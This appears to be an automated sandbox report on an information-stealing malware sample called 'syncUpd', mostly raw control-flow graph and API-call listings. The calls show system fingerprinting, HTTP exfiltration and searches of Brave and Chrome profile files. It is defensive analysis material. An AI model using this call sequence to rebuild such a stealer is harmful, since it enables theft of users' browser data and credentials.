
416ea0 lstrcpy 80105->80106 80107 40491e 80106->80107 80108 416fb0 4 API calls 80107->80108 80109 40493d 80108->80109 80110 416ea0 lstrcpy 80109->80110 80111 404946 80110->80111 80112 416f20 3 API calls 80111->80112 80113 404964 80112->80113 80114 416ea0 lstrcpy 80113->80114 80115 40496d 80114->80115 80116 416fb0 4 API calls 80115->80116 80117 40498c 80116->80117 80118 416ea0 lstrcpy 80117->80118 80119 404995 80118->80119 80120 416fb0 4 API calls 80119->80120 80121 4049b6 80120->80121 80122 416ea0 lstrcpy 80121->80122 80123 4049bf 80122->80123 80124 416fb0 4 API calls 80123->80124 80125 4049df 80124->80125 80126 416ea0 lstrcpy 80125->80126 80127 4049e8 80126->80127 80128 416fb0 4 API calls 80127->80128 80129 404a07 80128->80129 80130 416ea0 lstrcpy 80129->80130 80131 404a10 80130->80131 80132 416f20 3 API calls 80131->80132 80133 404a2e 80132->80133 80134 416ea0 lstrcpy 80133->80134 80135 404a37 80134->80135 80136 416d40 lstrcpy 80135->80136 80137 404a52 80136->80137 80138 416f20 3 API calls 80137->80138 80139 404a73 80138->80139 80140 416f20 3 API calls 80139->80140 80141 404a7a 80140->80141 80142 416ea0 lstrcpy 80141->80142 80143 404a86 80142->80143 80144 404aa7 lstrlen 80143->80144 80145 404aba 80144->80145 80146 404ac3 lstrlen 80145->80146 80852 4170d0 80146->80852 80148 404ad3 HttpSendRequestA 80149 404af2 InternetReadFile 80148->80149 80150 404b27 InternetCloseHandle 80149->80150 80155 404b1e 80149->80155 80152 416e00 80150->80152 80152->80075 80153 416fb0 4 API calls 80153->80155 80154 416ea0 lstrcpy 80154->80155 80155->80149 80155->80150 80155->80153 80155->80154 80862 4170d0 80156->80862 80158 40fb04 StrCmpCA 80159 40fb17 80158->80159 80160 40fb0f ExitProcess 80158->80160 80161 40fb27 strtok_s 80159->80161 80173 40fb34 80161->80173 80162 40fccc 80162->79208 80163 40fca8 strtok_s 80163->80173 80164 40fc8b StrCmpCA 80164->80163 80164->80173 80165 40fc6c StrCmpCA 80165->80173 80166 40fb9d StrCmpCA 80166->80173 80167 40fbed StrCmpCA 80167->80173 80168 40fc4d 
StrCmpCA 80168->80173 80169 40fc2e StrCmpCA 80169->80173 80170 40fbbf StrCmpCA 80170->80173 80171 40fc0f StrCmpCA 80171->80173 80172 416e20 lstrlen lstrcpy 80172->80173 80173->80162 80173->80163 80173->80164 80173->80165 80173->80166 80173->80167 80173->80168 80173->80169 80173->80170 80173->80171 80173->80172 80175 416da0 lstrcpy 80174->80175 80176 401513 80175->80176 80177 416da0 lstrcpy 80176->80177 80178 401525 80177->80178 80179 416da0 lstrcpy 80178->80179 80180 401537 80179->80180 80181 416da0 lstrcpy 80180->80181 80182 401549 80181->80182 80183 405610 80182->80183 80184 416da0 lstrcpy 80183->80184 80185 405629 80184->80185 80186 404470 3 API calls 80185->80186 80187 405635 80186->80187 80188 416d40 lstrcpy 80187->80188 80189 40566a 80188->80189 80190 416d40 lstrcpy 80189->80190 80191 405677 80190->80191 80192 416d40 lstrcpy 80191->80192 80193 405684 80192->80193 80194 416d40 lstrcpy 80193->80194 80195 405691 80194->80195 80196 416d40 lstrcpy 80195->80196 80197 40569e InternetOpenA StrCmpCA 80196->80197 80198 4056cd 80197->80198 80199 405c70 InternetCloseHandle 80198->80199 80201 415260 3 API calls 80198->80201 80200 405c8d 80199->80200 80203 4094a0 4 API calls 80200->80203 80202 4056ec 80201->80202 80204 416f20 3 API calls 80202->80204 80205 405c93 80203->80205 80206 4056ff 80204->80206 80208 416e20 2 API calls 80205->80208 80211 405ccc codecvt 80205->80211 80207 416ea0 lstrcpy 80206->80207 80213 405708 80207->80213 80209 405caa 80208->80209 80210 416fb0 4 API calls 80209->80210 80212 405cc0 80210->80212 80215 416da0 lstrcpy 80211->80215 80214 416ea0 lstrcpy 80212->80214 80216 416fb0 4 API calls 80213->80216 80214->80211 80225 405cfc 80215->80225 80217 405732 80216->80217 80218 416ea0 lstrcpy 80217->80218 80219 40573b 80218->80219 80220 416fb0 4 API calls 80219->80220 80221 40575a 80220->80221 80222 416ea0 lstrcpy 80221->80222 80223 405763 80222->80223 80224 416f20 3 API calls 80223->80224 80226 405781 80224->80226 80225->79214 80227 416ea0 lstrcpy 
80226->80227 80228 40578a 80227->80228 80229 416fb0 4 API calls 80228->80229 80230 4057a9 80229->80230 80231 416ea0 lstrcpy 80230->80231 80232 4057b2 80231->80232 80233 416fb0 4 API calls 80232->80233 80234 4057d1 80233->80234 80235 416ea0 lstrcpy 80234->80235 80236 4057da 80235->80236 80237 416fb0 4 API calls 80236->80237 80238 405806 80237->80238 80239 416f20 3 API calls 80238->80239 80240 40580d 80239->80240 80241 416ea0 lstrcpy 80240->80241 80242 405816 80241->80242 80243 40582c InternetConnectA 80242->80243 80243->80199 80244 40585c HttpOpenRequestA 80243->80244 80246 405c63 InternetCloseHandle 80244->80246 80247 4058bb 80244->80247 80246->80199 80248 416fb0 4 API calls 80247->80248 80249 4058cf 80248->80249 80250 416ea0 lstrcpy 80249->80250 80251 4058d8 80250->80251 80252 416f20 3 API calls 80251->80252 80253 4058f6 80252->80253 80254 416ea0 lstrcpy 80253->80254 80255 4058ff 80254->80255 80256 416fb0 4 API calls 80255->80256 80257 40591e 80256->80257 80258 416ea0 lstrcpy 80257->80258 80259 405927 80258->80259 80260 416fb0 4 API calls 80259->80260 80261 405948 80260->80261 80262 416ea0 lstrcpy 80261->80262 80263 405951 80262->80263 80264 416fb0 4 API calls 80263->80264 80265 405971 80264->80265 80266 416ea0 lstrcpy 80265->80266 80267 40597a 80266->80267 80268 416fb0 4 API calls 80267->80268 80269 405999 80268->80269 80270 416ea0 lstrcpy 80269->80270 80271 4059a2 80270->80271 80272 416f20 3 API calls 80271->80272 80273 4059c0 80272->80273 80274 416ea0 lstrcpy 80273->80274 80275 4059c9 80274->80275 80276 416fb0 4 API calls 80275->80276 80277 4059e8 80276->80277 80278 416ea0 lstrcpy 80277->80278 80279 4059f1 80278->80279 80280 416fb0 4 API calls 80279->80280 80281 405a10 80280->80281 80282 416ea0 lstrcpy 80281->80282 80283 405a19 80282->80283 80284 416f20 3 API calls 80283->80284 80285 405a37 80284->80285 80286 416ea0 lstrcpy 80285->80286 80287 405a40 80286->80287 80288 416fb0 4 API calls 80287->80288 80289 405a5f 80288->80289 80290 416ea0 lstrcpy 80289->80290 
80291 405a68 80290->80291 80292 416fb0 4 API calls 80291->80292 80293 405a89 80292->80293 80294 416ea0 lstrcpy 80293->80294 80295 405a92 80294->80295 80296 416fb0 4 API calls 80295->80296 80297 405ab2 80296->80297 80298 416ea0 lstrcpy 80297->80298 80299 405abb 80298->80299 80300 416fb0 4 API calls 80299->80300 80301 405ada 80300->80301 80302 416ea0 lstrcpy 80301->80302 80303 405ae3 80302->80303 80304 416f20 3 API calls 80303->80304 80305 405b01 80304->80305 80306 416ea0 lstrcpy 80305->80306 80307 405b0a 80306->80307 80308 405b1d lstrlen 80307->80308 80863 4170d0 80308->80863 80310 405b2e lstrlen GetProcessHeap HeapAlloc 80864 4170d0 80310->80864 80312 405b5b lstrlen 80865 4170d0 80312->80865 80314 405b6b memcpy 80866 4170d0 80314->80866 80316 405b84 lstrlen 80317 405b94 80316->80317 80318 405b9d lstrlen memcpy 80317->80318 80867 4170d0 80318->80867 80320 405bc7 lstrlen 80868 4170d0 80320->80868 80322 405bd7 HttpSendRequestA 80323 405be2 InternetReadFile 80322->80323 80324 405c17 InternetCloseHandle 80323->80324 80328 405c0e 80323->80328 80324->80246 80326 416fb0 4 API calls 80326->80328 80327 416ea0 lstrcpy 80327->80328 80328->80323 80328->80324 80328->80326 80328->80327 80869 4170d0 80329->80869 80331 40f3d7 strtok_s 80333 40f3e4 80331->80333 80332 40f4b1 80332->79216 80333->80332 80334 40f48d strtok_s 80333->80334 80335 416e20 lstrlen lstrcpy 80333->80335 80334->80333 80335->80333 80870 4170d0 80336->80870 80338 40f227 strtok_s 80344 40f234 80338->80344 80339 40f387 80339->79224 80340 40f363 strtok_s 80340->80344 80341 40f314 StrCmpCA 80341->80344 80342 40f297 StrCmpCA 80342->80344 80343 40f2d7 StrCmpCA 80343->80344 80344->80339 80344->80340 80344->80341 80344->80342 80344->80343 80345 416e20 lstrlen lstrcpy 80344->80345 80345->80344 80347 416d40 lstrcpy 80346->80347 80348 40fd26 80347->80348 80349 416fb0 4 API calls 80348->80349 80350 40fd37 80349->80350 80351 416ea0 lstrcpy 80350->80351 80352 40fd40 80351->80352 80353 416fb0 4 API calls 80352->80353 80354 
40fd5b 80353->80354 80355 416ea0 lstrcpy 80354->80355 80356 40fd64 80355->80356 80357 416fb0 4 API calls 80356->80357 80358 40fd7d 80357->80358 80359 416ea0 lstrcpy 80358->80359 80360 40fd86 80359->80360 80361 416fb0 4 API calls 80360->80361 80362 40fda1 80361->80362 80363 416ea0 lstrcpy 80362->80363 80364 40fdaa 80363->80364 80365 416fb0 4 API calls 80364->80365 80366 40fdc3 80365->80366 80367 416ea0 lstrcpy 80366->80367 80368 40fdcc 80367->80368 80369 416fb0 4 API calls 80368->80369 80370 40fde7 80369->80370 80371 416ea0 lstrcpy 80370->80371 80372 40fdf0 80371->80372 80373 416fb0 4 API calls 80372->80373 80374 40fe09 80373->80374 80375 416ea0 lstrcpy 80374->80375 80376 40fe12 80375->80376 80377 416fb0 4 API calls 80376->80377 80378 40fe2d 80377->80378 80379 416ea0 lstrcpy 80378->80379 80380 40fe36 80379->80380 80381 416fb0 4 API calls 80380->80381 80382 40fe4f 80381->80382 80383 416ea0 lstrcpy 80382->80383 80384 40fe58 80383->80384 80385 416fb0 4 API calls 80384->80385 80386 40fe76 80385->80386 80387 416ea0 lstrcpy 80386->80387 80388 40fe7f 80387->80388 80389 4141c0 6 API calls 80388->80389 80390 40fe96 80389->80390 80391 416f20 3 API calls 80390->80391 80392 40fea9 80391->80392 80393 416ea0 lstrcpy 80392->80393 80394 40feb2 80393->80394 80395 416fb0 4 API calls 80394->80395 80396 40fedc 80395->80396 80397 416ea0 lstrcpy 80396->80397 80398 40fee5 80397->80398 80399 416fb0 4 API calls 80398->80399 80400 40ff05 80399->80400 80401 416ea0 lstrcpy 80400->80401 80402 40ff0e 80401->80402 80871 414300 GetProcessHeap HeapAlloc RegOpenKeyExA 80402->80871 80404 40ff1e 80405 416fb0 4 API calls 80404->80405 80406 40ff2e 80405->80406 80407 416ea0 lstrcpy 80406->80407 80408 40ff37 80407->80408 80409 416fb0 4 API calls 80408->80409 80410 40ff56 80409->80410 80411 416ea0 lstrcpy 80410->80411 80412 40ff5f 80411->80412 80413 416fb0 4 API calls 80412->80413 80414 40ff80 80413->80414 80415 416ea0 lstrcpy 80414->80415 80416 40ff89 80415->80416 80874 414380 GetCurrentProcess 
IsWow64Process 80416->80874 80419 416fb0 4 API calls 80420 40ffa9 80419->80420 80421 416ea0 lstrcpy 80420->80421 80422 40ffb2 80421->80422 80423 416fb0 4 API calls 80422->80423 80424 40ffd1 80423->80424 80425 416ea0 lstrcpy 80424->80425 80426 40ffda 80425->80426 80427 416fb0 4 API calls 80426->80427 80428 40fffb 80427->80428 80429 416ea0 lstrcpy 80428->80429 80430 410004 80429->80430 80876 4143c0 GetProcessHeap HeapAlloc GetUserNameA 80430->80876 80432 410014 80433 416fb0 4 API calls 80432->80433 80434 410024 80433->80434 80435 416ea0 lstrcpy 80434->80435 80436 41002d 80435->80436 80437 416fb0 4 API calls 80436->80437 80438 41004c 80437->80438 80439 416ea0 lstrcpy 80438->80439 80440 410055 80439->80440 80441 416fb0 4 API calls 80440->80441 80442 410075 80441->80442 80443 416ea0 lstrcpy 80442->80443 80444 41007e 80443->80444 80445 414400 3 API calls 80444->80445 80446 41008e 80445->80446 80447 416fb0 4 API calls 80446->80447 80448 41009e 80447->80448 80449 416ea0 lstrcpy 80448->80449 80450 4100a7 80449->80450 80451 416fb0 4 API calls 80450->80451 80452 4100c6 80451->80452 80453 416ea0 lstrcpy 80452->80453 80454 4100cf 80453->80454 80455 416fb0 4 API calls 80454->80455 80456 4100f0 80455->80456 80457 416ea0 lstrcpy 80456->80457 80458 4100f9 80457->80458 80877 414450 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 80458->80877 80460 410109 80461 416fb0 4 API calls 80460->80461 80462 410119 80461->80462 80463 416ea0 lstrcpy 80462->80463 80464 410122 80463->80464 80465 416fb0 4 API calls 80464->80465 80466 410141 80465->80466 80467 416ea0 lstrcpy 80466->80467 80468 41014a 80467->80468 80469 416fb0 4 API calls 80468->80469 80470 41016b 80469->80470 80471 416ea0 lstrcpy 80470->80471 80472 410174 80471->80472 80878 4144b0 GetProcessHeap HeapAlloc GetTimeZoneInformation 80472->80878 80475 416fb0 4 API calls 80476 410194 80475->80476 80477 416ea0 lstrcpy 80476->80477 80478 41019d 80477->80478 80479 416fb0 4 API calls 80478->80479 80480 4101bc 80479->80480 80481 416ea0 
lstrcpy 80480->80481 80482 4101c5 80481->80482 80483 416fb0 4 API calls 80482->80483 80484 4101e5 80483->80484 80485 416ea0 lstrcpy 80484->80485 80486 4101ee 80485->80486 80881 414530 GetUserDefaultLocaleName 80486->80881 80489 416fb0 4 API calls 80490 41020e 80489->80490 80491 416ea0 lstrcpy 80490->80491 80492 410217 80491->80492 80493 416fb0 4 API calls 80492->80493 80494 410236 80493->80494 80495 416ea0 lstrcpy 80494->80495 80496 41023f 80495->80496 80497 416fb0 4 API calls 80496->80497 80498 410260 80497->80498 80499 416ea0 lstrcpy 80498->80499 80500 410269 80499->80500 80886 414570 80500->80886 80502 410280 80503 416f20 3 API calls 80502->80503 80504 410293 80503->80504 80505 416ea0 lstrcpy 80504->80505 80506 41029c 80505->80506 80507 416fb0 4 API calls 80506->80507 80508 4102c6 80507->80508 80509 416ea0 lstrcpy 80508->80509 80510 4102cf 80509->80510 80511 416fb0 4 API calls 80510->80511 80512 4102ef 80511->80512 80513 416ea0 lstrcpy 80512->80513 80514 4102f8 80513->80514 80898 414710 GetSystemPowerStatus 80514->80898 80517 416fb0 4 API calls 80518 410318 80517->80518 80519 416ea0 lstrcpy 80518->80519 80520 410321 80519->80520 80521 416fb0 4 API calls 80520->80521 80522 410340 80521->80522 80523 416ea0 lstrcpy 80522->80523 80524 410349 80523->80524 80525 416fb0 4 API calls 80524->80525 80526 41036a 80525->80526 80527 416ea0 lstrcpy 80526->80527 80528 410373 80527->80528 80529 41037e GetCurrentProcessId 80528->80529 80900 415b70 OpenProcess 80529->80900 80532 416f20 3 API calls 80533 4103a4 80532->80533 80534 416ea0 lstrcpy 80533->80534 80535 4103ad 80534->80535 80536 416fb0 4 API calls 80535->80536 80537 4103d7 80536->80537 80538 416ea0 lstrcpy 80537->80538 80539 4103e0 80538->80539 80540 416fb0 4 API calls 80539->80540 80541 410400 80540->80541 80542 416ea0 lstrcpy 80541->80542 80543 410409 80542->80543 80905 414740 GetProcessHeap HeapAlloc RegOpenKeyExA 80543->80905 80545 410419 80546 416fb0 4 API calls 80545->80546 80547 410429 80546->80547 80548 416ea0 
lstrcpy 80547->80548 80549 410432 80548->80549 80550 416fb0 4 API calls 80549->80550 80551 410451 80550->80551 80552 416ea0 lstrcpy 80551->80552 80553 41045a 80552->80553 80554 416fb0 4 API calls 80553->80554 80555 41047b 80554->80555 80556 416ea0 lstrcpy 80555->80556 80557 410484 80556->80557 80908 414800 80557->80908 80560 416fb0 4 API calls 80561 4104a4 80560->80561 80562 416ea0 lstrcpy 80561->80562 80563 4104ad 80562->80563 80564 416fb0 4 API calls 80563->80564 80565 4104cc 80564->80565 80566 416ea0 lstrcpy 80565->80566 80567 4104d5 80566->80567 80568 416fb0 4 API calls 80567->80568 80569 4104f6 80568->80569 80570 416ea0 lstrcpy 80569->80570 80571 4104ff 80570->80571 80923 4147c0 GetSystemInfo wsprintfA 80571->80923 80573 41050f 80574 416fb0 4 API calls 80573->80574 80575 41051f 80574->80575 80576 416ea0 lstrcpy 80575->80576 80577 410528 80576->80577 80578 416fb0 4 API calls 80577->80578 80579 410547 80578->80579 80580 416ea0 lstrcpy 80579->80580 80581 410550 80580->80581 80582 416fb0 4 API calls 80581->80582 80583 410570 80582->80583 80584 416ea0 lstrcpy 80583->80584 80585 410579 80584->80585 80924 414960 GetProcessHeap HeapAlloc 80585->80924 80587 410589 80588 416fb0 4 API calls 80587->80588 80589 410599 80588->80589 80590 416ea0 lstrcpy 80589->80590 80591 4105a2 80590->80591 80592 416fb0 4 API calls 80591->80592 80593 4105c1 80592->80593 80594 416ea0 lstrcpy 80593->80594 80595 4105ca 80594->80595 80596 416fb0 4 API calls 80595->80596 80597 4105eb 80596->80597 80598 416ea0 lstrcpy 80597->80598 80599 4105f4 80598->80599 80929 414ed0 80599->80929 80602 416f20 3 API calls 80603 41061e 80602->80603 80604 416ea0 lstrcpy 80603->80604 80605 410627 80604->80605 80606 416fb0 4 API calls 80605->80606 80607 410651 80606->80607 80608 416ea0 lstrcpy 80607->80608 80609 41065a 80608->80609 80610 416fb0 4 API calls 80609->80610 80611 41067a 80610->80611 80612 416ea0 lstrcpy 80611->80612 80613 410683 80612->80613 80614 416fb0 4 API calls 80613->80614 80615 4106a2 80614->80615 
80616 416ea0 lstrcpy 80615->80616 80617 4106ab 80616->80617 80934 414a00 80617->80934 80619 4106c2 80620 416f20 3 API calls 80619->80620 80621 4106d5 80620->80621 80622 416ea0 lstrcpy 80621->80622 80623 4106de 80622->80623 80624 416fb0 4 API calls 80623->80624 80625 41070a 80624->80625 80626 416ea0 lstrcpy 80625->80626 80627 410713 80626->80627 80628 416fb0 4 API calls 80627->80628 80629 410732 80628->80629 80630 416ea0 lstrcpy 80629->80630 80631 41073b 80630->80631 80632 416fb0 4 API calls 80631->80632 80633 41075c 80632->80633 80634 416ea0 lstrcpy 80633->80634 80635 410765 80634->80635 80636 416fb0 4 API calls 80635->80636 80637 410784 80636->80637 80638 416ea0 lstrcpy 80637->80638 80639 41078d 80638->80639 80640 416fb0 4 API calls 80639->80640 80641 4107ae 80640->80641 80642 416ea0 lstrcpy 80641->80642 80643 4107b7 80642->80643 80942 414ae0 80643->80942 80645 4107d3 80646 416f20 3 API calls 80645->80646 80647 4107e6 80646->80647 80648 416ea0 lstrcpy 80647->80648 80649 4107ef 80648->80649 80650 416fb0 4 API calls 80649->80650 80651 410819 80650->80651 80652 416ea0 lstrcpy 80651->80652 80653 410822 80652->80653 80654 416fb0 4 API calls 80653->80654 80655 410843 80654->80655 80656 416ea0 lstrcpy 80655->80656 80657 41084c 80656->80657 80658 414ae0 17 API calls 80657->80658 80659 410868 80658->80659 80660 416f20 3 API calls 80659->80660 80661 41087b 80660->80661 80662 416ea0 lstrcpy 80661->80662 80663 410884 80662->80663 80664 416fb0 4 API calls 80663->80664 80665 4108ae 80664->80665 80666 416ea0 lstrcpy 80665->80666 80667 4108b7 80666->80667 80668 416fb0 4 API calls 80667->80668 80669 4108d6 80668->80669 80670 416ea0 lstrcpy 80669->80670 80671 4108df 80670->80671 80672 416fb0 4 API calls 80671->80672 80673 410900 80672->80673 80674 416ea0 lstrcpy 80673->80674 80675 410909 80674->80675 80978 414de0 80675->80978 80677 410920 80678 416f20 3 API calls 80677->80678 80679 410933 80678->80679 80680 416ea0 lstrcpy 80679->80680 80681 41093c 80680->80681 80682 41095a lstrlen 
80681->80682 80683 41096a 80682->80683 80684 416d40 lstrcpy 80683->80684 80685 41097c 80684->80685 80686 401500 lstrcpy 80685->80686 80687 41098a 80686->80687 80988 404dc0 80687->80988 80689 410996 80689->79228 81169 4170d0 80690->81169 80692 404cc9 InternetOpenUrlA 80696 404ce1 80692->80696 80693 404cea InternetReadFile 80693->80696 80694 404d5c InternetCloseHandle InternetCloseHandle 80695 404da8 80694->80695 80695->79232 80696->80693 80696->80694 81170 4092b0 80697->81170 80699 40ef93 80700 40efb4 80699->80700 80701 40f1cf 80699->80701 80703 40efcd StrCmpCA 80700->80703 80702 401500 lstrcpy 80701->80702 80704 40f1dd 80702->80704 80705 40f04f 80703->80705 80706 40efd8 80703->80706 81334 40ea90 80704->81334 80710 40f06e StrCmpCA 80705->80710 80709 416da0 lstrcpy 80706->80709 80711 40eff0 80709->80711 80712 40f07d 80710->80712 80749 40f14e 80710->80749 80713 401500 lstrcpy 80711->80713 80714 416d40 lstrcpy 80712->80714 80715 40f01e 80713->80715 80717 40f08a 80714->80717 80718 416da0 lstrcpy 80715->80718 80716 40f17d StrCmpCA 80719 40f188 80716->80719 80720 40f1c7 80716->80720 80721 416fb0 4 API calls 80717->80721 80722 40f032 80718->80722 80723 401500 lstrcpy 80719->80723 80720->79236 80724 40f0b2 80721->80724 80725 416da0 lstrcpy 80722->80725 80726 40f196 80723->80726 80727 416f20 3 API calls 80724->80727 80728 40f04a 80725->80728 80729 416da0 lstrcpy 80726->80729 80730 40f0b9 80727->80730 81173 40e420 80728->81173 80732 40f1aa 80729->80732 80733 416fb0 4 API calls 80730->80733 80734 416da0 lstrcpy 80732->80734 80749->80716 80827 404486 80826->80827 80858 414ff0 malloc 80827->80858 80829 4044af 80859 414ff0 malloc 80829->80859 80831 4044c5 80860 414ff0 malloc 80831->80860 80833 4044db 80834 4044f5 lstrlen 80833->80834 80861 4170d0 80834->80861 80836 404505 InternetCrackUrlA 80837 404524 80836->80837 80837->80015 80839 416d40 lstrcpy 80838->80839 80840 415274 80839->80840 80841 416d40 lstrcpy 80840->80841 80842 415282 GetSystemTime 80841->80842 80843 415299 
80842->80843 80844 416da0 lstrcpy 80843->80844 80845 4152fc 80844->80845 80845->80030 80847 416f31 80846->80847 80848 416f88 80847->80848 80850 416f68 lstrcpy lstrcat 80847->80850 80849 416da0 lstrcpy 80848->80849 80851 416f94 80849->80851 80850->80848 80851->80033 80852->80148 80854 4094d9 LocalAlloc 80853->80854 80855 404bae 80853->80855 80854->80855 80856 4094f4 CryptStringToBinaryA 80854->80856 80855->80036 80855->80038 80856->80855 80857 409519 LocalFree 80856->80857 80857->80855 80858->80829 80859->80831 80860->80833 80861->80836 80862->80158 80863->80310 80864->80312 80865->80314 80866->80316 80867->80320 80868->80322 80869->80331 80870->80338 80872 414362 RegCloseKey 80871->80872 80873 414345 RegQueryValueExA 80871->80873 80872->80404 80873->80872 80875 40ff99 80874->80875 80875->80419 80876->80432 80877->80460 80879 4144f7 wsprintfA 80878->80879 80880 410184 80878->80880 80879->80880 80880->80475 80882 41455a 80881->80882 80883 4101fe 80881->80883 81150 415420 LocalAlloc CharToOemW 80882->81150 80883->80489 80885 414566 80885->80883 80887 416d40 lstrcpy 80886->80887 80888 414589 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 80887->80888 80891 4145e2 80888->80891 80889 414603 GetLocaleInfoA 80889->80891 80890 4146d5 80892 4146e5 80890->80892 80893 4146db LocalFree 80890->80893 80891->80889 80891->80890 80896 416ea0 lstrcpy 80891->80896 80897 416fb0 lstrcpy lstrlen lstrcpy lstrcat 80891->80897 80894 416da0 lstrcpy 80892->80894 80893->80892 80895 4146f4 80894->80895 80895->80502 80896->80891 80897->80891 80899 410308 80898->80899 80899->80517 80901 415b93 K32GetModuleFileNameExA CloseHandle 80900->80901 80902 415bb5 80900->80902 80901->80902 80903 416d40 lstrcpy 80902->80903 80904 410391 80903->80904 80904->80532 80906 4147a2 RegCloseKey 80905->80906 80907 414785 RegQueryValueExA 80905->80907 80906->80545 80907->80906 80909 414836 GetLogicalProcessorInformationEx 80908->80909 80910 414855 GetLastError 80909->80910 80913 4148ab 80909->80913 80911 
414860 80910->80911 80912 41489f 80910->80912 80922 414869 80911->80922 80916 410494 80912->80916 81154 4150f0 GetProcessHeap HeapFree 80912->81154 81153 4150f0 GetProcessHeap HeapFree 80913->81153 80916->80560 80919 4148fd 80919->80916 80921 414906 wsprintfA 80919->80921 80920 414893 80920->80916 80921->80916 80922->80909 80922->80920 81151 4150f0 GetProcessHeap HeapFree 80922->81151 81152 415110 GetProcessHeap HeapAlloc 80922->81152 80923->80573 80925 415090 80924->80925 80926 41498a GlobalMemoryStatusEx 80925->80926 80927 4149a0 __aulldiv 80926->80927 80928 4149d8 wsprintfA 80927->80928 80928->80587 80930 414ee8 GetProcessHeap HeapAlloc wsprintfA 80929->80930 80932 416d40 lstrcpy 80930->80932 80933 41060b 80932->80933 80933->80602 80935 416d40 lstrcpy 80934->80935 80940 414a16 80935->80940 80936 414a50 80938 416da0 lstrcpy 80936->80938 80937 416fb0 lstrcpy lstrlen lstrcpy lstrcat 80937->80940 80939 414ac9 80938->80939 80939->80619 80940->80936 80940->80937 80941 416ea0 lstrcpy 80940->80941 80941->80940 80943 416d40 lstrcpy 80942->80943 80944 414af9 RegOpenKeyExA 80943->80944 80945 414b4b 80944->80945 80946 414b6d 80944->80946 80947 416da0 lstrcpy 80945->80947 80948 414db0 RegCloseKey 80946->80948 80949 414b95 RegEnumKeyExA 80946->80949 80951 414b5a 80947->80951 80950 416da0 lstrcpy 80948->80950 80952 414dab 80949->80952 80953 414bdc wsprintfA RegOpenKeyExA 80949->80953 80950->80951 80951->80645 80952->80948 80954 414c22 RegCloseKey RegCloseKey 80953->80954 80955 414c5e RegQueryValueExA 80953->80955 80956 416da0 lstrcpy 80954->80956 80957 414c97 lstrlen 80955->80957 80958 414d9e RegCloseKey 80955->80958 80956->80951 80957->80958 80959 414cad 80957->80959 80958->80952 80960 416fb0 4 API calls 80959->80960 80961 414cc4 80960->80961 80962 416ea0 lstrcpy 80961->80962 80963 414cd0 80962->80963 80964 416fb0 4 API calls 80963->80964 80965 414cf4 80964->80965 80966 416ea0 lstrcpy 80965->80966 80967 414d00 80966->80967 80968 414d0b RegQueryValueExA 80967->80968 
[Control-flow graph residue: flattened node-to-node edge listing (basic-block addresses and their API calls) from the rendered graph; omitted here, the per-function API calls are listed under "APIs" below.]

Control-flow Graph

APIs
• wsprintfA.USER32 ref: 00411669
• FindFirstFileA.KERNEL32(?,?), ref: 00411680
• lstrcat.KERNEL32(?,?), ref: 004116D2
• StrCmpCA.SHLWAPI(?,0041D7F8), ref: 004116E4
• StrCmpCA.SHLWAPI(?,0041D7FC), ref: 004116FA
• FindNextFileA.KERNEL32(000000FF,?), ref: 00411980
• FindClose.KERNEL32(000000FF), ref: 00411995
Strings
Memory Dump Source
• Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
Yara matches
Similarity
• API ID: Find$File$CloseFirstNextlstrcatwsprintf
• String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
• API String ID: 1125553467-2524465048
• Opcode ID: dc165bfe059858b008f46a8c8689db8cb5fddec1d4dee71b8375d3b2251b46db
• Instruction ID: 56f1237c2d7c520c90c98f1ce5fb3a6d9b51b415e2d0c2f733ce4a2014328567
• Opcode Fuzzy Hash: dc165bfe059858b008f46a8c8689db8cb5fddec1d4dee71b8375d3b2251b46db
• Instruction Fuzzy Hash: AE9172B19006189BDB24EFA4DC85FEA737DBF88300F044589F61A92191DB789AC5CFA5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph for the function at 0040B610 (executed / not-executed basic-block graph): flattened edge listing omitted here; the function's API calls are listed under "APIs" below.]
APIs
  • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
  • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
  • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
  • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
  • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
  • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
  • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
• FindFirstFileA.KERNEL32(00000000,?,0041D71A,0041D717,00000000,?,?,?,0041DB54,0041D716), ref: 0040B695
• StrCmpCA.SHLWAPI(?,0041DB58), ref: 0040B6ED
• StrCmpCA.SHLWAPI(?,0041DB5C), ref: 0040B703
• FindNextFileA.KERNEL32(000000FF,?), ref: 0040BF3B
• FindClose.KERNEL32(000000FF), ref: 0040BF4D
Strings
Memory Dump Source
• Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
Yara matches
Similarity
• API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
• String ID: @Kr$Brave$Google Chrome$Preferences$\Brave\Preferences
• API String ID: 3334442632-1995909648
• Opcode ID: c7c3ee99c4ae816946169d1e265cb946bac083ea11a6c42839c32c6eeee0e167
